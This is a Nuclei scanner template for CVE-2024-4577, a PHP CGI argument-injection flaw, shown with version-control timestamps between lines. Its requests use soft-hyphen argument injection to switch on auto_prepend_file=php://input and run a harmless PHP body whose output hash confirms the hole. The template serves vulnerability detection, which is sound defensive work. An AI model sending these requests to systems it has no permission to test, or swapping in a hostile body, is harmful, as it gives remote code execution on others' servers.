2024-06-07 15:28:59 +00:00
|
|
|
id: CVE-2024-4577
|
|
|
|
|
|
|
|
info:
|
2024-06-09 19:26:25 +00:00
|
|
|
name: PHP CGI - Argument Injection
|
|
|
|
author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch
|
|
|
|
severity: critical
|
2024-07-18 02:47:27 +00:00
|
|
|
reference:
|
|
|
|
- https://cloud.tencent.com/developer/article/2429455
|
2024-06-07 15:28:59 +00:00
|
|
|
description: |
|
2024-06-09 19:40:14 +00:00
|
|
|
PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.
|
2024-06-09 19:26:25 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation could lead to remote code execution on the affected system.
|
|
|
|
remediation: |
|
|
|
|
Apply the vendor-supplied patches or upgrade to a non-vulnerable version.
|
2024-06-09 19:27:20 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
2024-07-18 02:47:27 +00:00
|
|
|
tags: cve,cve2024,php,cgi,xampp,rce
|
2024-06-07 15:28:59 +00:00
|
|
|
|
2024-06-09 19:45:25 +00:00
|
|
|
http:
|
2024-06-09 19:26:25 +00:00
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
|
|
|
|
- "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
|
|
|
|
- "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
|
|
|
|
- "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
|
2024-06-07 15:28:59 +00:00
|
|
|
|
2024-06-09 19:26:25 +00:00
|
|
|
body: |
|
|
|
|
<?php echo md5("CVE-2024-4577"); ?>
|
2024-06-07 15:28:59 +00:00
|
|
|
|
2024-06-09 19:26:25 +00:00
|
|
|
stop-at-first-match: true
|
2024-06-07 15:28:59 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
2024-06-09 19:26:25 +00:00
|
|
|
part: body
|
2024-06-07 15:28:59 +00:00
|
|
|
words:
|
2024-06-09 19:26:25 +00:00
|
|
|
- "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"
|
2024-07-18 02:47:27 +00:00
|
|
|
# digest: 4a0a004730450221008693eaa1040ef5b904550b0ec8d707667e4de37c2f03bcfb4cb631137ed90caf02203b9468a518628678b56886433cd50d65153bb54d66ac540ef0b535407471c01c:922c64590222798bb761d5b6d8e72950
|